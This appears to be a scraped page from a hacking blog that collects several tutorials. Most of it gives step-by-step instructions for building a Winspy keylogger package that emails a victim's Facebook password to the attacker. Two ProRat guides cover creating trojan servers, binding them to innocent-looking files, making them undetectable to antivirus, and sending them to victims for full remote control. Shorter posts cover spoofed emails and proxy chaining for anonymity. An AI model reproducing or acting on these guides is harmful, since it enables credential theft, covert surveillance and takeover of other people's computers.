Now backtrack should be loading and booting

After loading type startex to go to GUI mode.

Now run install backtrack.

Read More

How to hack Facebook password | .::APAJR::.

Facebook is the hot topic on my website and my inbox is full of requests to write about easy way to hack Facebook account. So i am writing now a easier way to hack facebook account.


First of all i want to say something about the keylogger i am going to use in this hack. I am writing about a Keylogger which is one of the best keylogger available in the market. It is really safe and comes with customer support. If you are looking for any Facebook hacking tool, i think this one is best. If you are not good in hacking or something like this, you can still use this software easily. It costs very less and all the free versions on some file hosting website comes with Trojan. So i will recommend to buy the tool rather than using the Trojan binded version available for free. If you really want to hack Facebook account, this is the best.


Download Here

This is the kelogger which will send you password in your email.


1. First of all get your Winspy keylogger. Download it from the link given below

Download

2. After downloading, run the program and create the user id and pasword. Remember this password as it is required each time you start Winspy and even while uninstalling.
3. Then a new dialog box will open to show you the hotkey (Ctrl + Shift + F12 ) to start keylogger.
4. Now press the hot key written in last step to go to the login form and enter login details to login.
5. Now you are on main screen of the software. Click on remote at top and then remote install.
user – type in the victim’s name
file name – Name the file to be sent. Use the name such that victim will love to accept it.
file icon – keep it the same
picture – select the picture you want to apply to the keylogger.

In the textfield of “Email keylog to” , enter your email address.
6. click on “Create Remote file”.

Now send this file to the person you want to hack. If victim runs this on his system, you will get all his keylogs in your email. Check keylogs for the password of the victim


see video

Read More

Download videos and songs from any website | Media Sniffer | .::APAJR::.

Download videos and songs from any website | Media Sniffer

When you are viewing videos on a web browser, or downloading media on an iTunes etc., this tool can often sniff out the download links of these media. Then you can download them directly by any http download tools. This tool can allow you to download media files from any website such as Youtube, metacafe, iTunes and many others which serve media but do not give the download links.

Downoad Here:
http://sourceforge.net/projects/mediasniffer/files/win32-bin/MediaSniffer-win32-bin-1.0.0.11.zip/download

Read More

How to hack with Trojan | Prorat tutorial | .::APAJR::.

How to hack with Trojan | Prorat tutorial

Prorat a famous trojan for hacking system, facebook, gmail, yahoo, twitter and other accounts. Today i wil show you step by step guide to hack with Prorat.


First of download Prorat from the given link
ProRat


Then disable your antivirus. It is necessary other wise your downloaded trojan will be detected and deleted. Don't worry, it will not harm your system at this stage.


Now run Prorat.exe
You will see the prorat window. There are so many options but you have to create a server first.

So click on create server.
There will be 3 options

1. Create Prorat server


2. Create Downloader Server


3. Create Cgi Victim List & usage

now click on create prorat server


A new window will popup. which will have a lots of options in side bar.

• Notifications


• General settings


• Bind with Files


• Server extnsions


• Server Icons

You have to use all options one by one to create a server.
Now in Notofication. Mark on Use Mail Notification and enter your email id. there will be a default id. Erase it and enter your. Then Test. It will send a testing mail to your email. Check your spam too.


Then Go to general settings and select all the options which you want to have in your trojan.


Then go to Bind with file and select file to bind your trojan with.
At last select your server extension and icon. Then click on Create server.
Now you have created a server.


Send this server file to the victim you want to hack, but before sending this file to victim make it FUD (Fully UnDetectable) with FUD cryptors. Search for this website for FUD articles.
after creating server FUD, it is ready to send to the victim.


Send this file to the victim. If the victim will run the server in the system, Trojan server will send you the notification email with the IP address of the victim. Use this ip and run your prorat.


At the top there is an option for IP and port. Enter thr IP and port and click on connect.
wait to connect.
After getting connected to the victim's system.. you can use any of the options available on the prorat to hack the user's system

Read More

Spyware removal tool | download Spybot Search & Destroy 1.6.2 | .::APAJR::.

                                                                                                  

Spybot Search & Destroy 1.6.2 Portable | 19.7 MB

Spyware is a special kind of threat and common anti-virus softwares do not yet cover. Many times you installed and software from a website or allow any script of a website, you are going to allow an spyware to enter in your system. You can predict this by uncommon behaviour in your computer. If you see new toolbars in your browser that you didn’t  install, if your browser crashes, or if you browser home page has changed without your knowing, you most probably have

spyware. But even if you don’t see anything, you may be infected, because more and more spyware is emerging that is silently tracking your surfing behaviour to create a marketing profile of you that will be sold to advertisement companies.

Spybot-S&D can also clean usage tracks, an interesting function if you share your computer with other users and don’t want them to see what you worked on. And for professional users, it allows to fix some registry inconsistencies and extended reports.

Spybot-S&D can start in two modes: Easy mode for new users who want just the basic features, and Advanced mode for professional users and those who want more control. Both modes are available in the free version.

Spybot – Search & Destroy now officially “Works with Windows7″

What is new in 1.6.2 Rev 2

Malware + Fraud.SecurityTool + Fraud.Sysguard + Win32.Chinky.gen + Win32.FraudLoad + Win32.FraudLoad.edt + Win32.Renos

Trojan + Win32.Agent.sn + Win32.Muollo ++ Win32.OnLineGames.bxya ++ Win32.OnLineGames.iisa ++ Win32.OnLineGames.kvqa ++ Win32.OnLineGames.lpva ++ Win32.OnLineGames.lwia ++ Win32.OnLineGames.mhva ++ Win32.OnLineGames.mofa ++ Win32.OnLineGames.mqza ++ Win32.OnLineGames.trna

Total: 1950290 fingerprints in 673779 rules for 6021 products.

Homepage – http://spybot.info

Download links:

http://uploading.com/files/7c1cm5c4/Spybot_Search_and_Destroy_1.6.2_Portable.rar/ http://www.fileserve.com/file/282JzJX/Spybot_Search_and_Destroy_1.6.2_Portable.rar

Read More

How to create Proxy chain | proxy chaining tutorial | .::APAJR::.

Proxy chaining 

A proxy is a server that acts as a gateway between your computer and your destination. Read my previous post on proxy server for detail. Proxy servers are used to stay anonymous over the internet. Take a look on my previous post where i wrote a list of proxies.
By using proxy server you can hide your real IP over the internet while surfing.


User---------->[proxy]----------->[website]


the website will get the IP of the proxy not yours.


Proxy Chaining: Proxy chaining is the use of more than 1 proxy servers to stay anonymous. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be. This can be shown like this..


User---------->[proxy1]---------->[proxy2]---------->[proxy3]---------->.......---------->[proxyN]---------->[website]


the user  first connect to Proxy1. After connecting to Proxy1, Now the user will connect to Proxy2, then, the user will connect to Proxy3, then the user will connect to Proxy4, and thus using N proxies, the user will then connect to website he want to use.


You can use as many proxies u want but you can never be 100% anonymous.

How to create proxy chaining

Download Proxy server Agent from the given link.
http://www.proxyserveragent.com/DOWNLOAD/

• Open 'Proxy Server Agent' and then click on 'Proxy Chains' and then click 'Add' to open the 'Add new proxy chain' window.


• change the proxy chain name and port number. The port number must be unique.


• Select the proxy chain type


• Add proxies to the proxy chain by clicking the 'Add proxy' or 'Add random proxy' button.


• The type of a proxy chain and last proxy in a chain should be the same.


• then Click OK.

Read More

Send Fake emails from any emai id | .::APAJR::.

There are some websites on the internet which allows you to send emails to any person. By using fake mail sender u can send emails to any email id by any email id (fake email id not necessary to exists). Suppose you know the email id of a person A. You want to send an email from the email id of person A. You can use these fake emailsender website to do that. You can send email by any email id either it exists or not.

try this fake mail sender website : mail.anonymizer

Read More

ProRat [Tutorial] | .::APAJR::.

1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.


2. Open up the program. You should see the following:



3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server.


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.



5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.



6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.





7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it.



8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.



9. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like.



10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.


11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.


12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.



13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples.



14. The image below shows the message I would get on my screen if the hacker chose to message me.



15. Below is an image of my task bar after the hacker clicks on Hide Start Button.



16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.



As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.



Download here:

http://www.mediafire.com/download.php?8404n8mr8gc930r



this rar is protected by password.

password : pro

Read More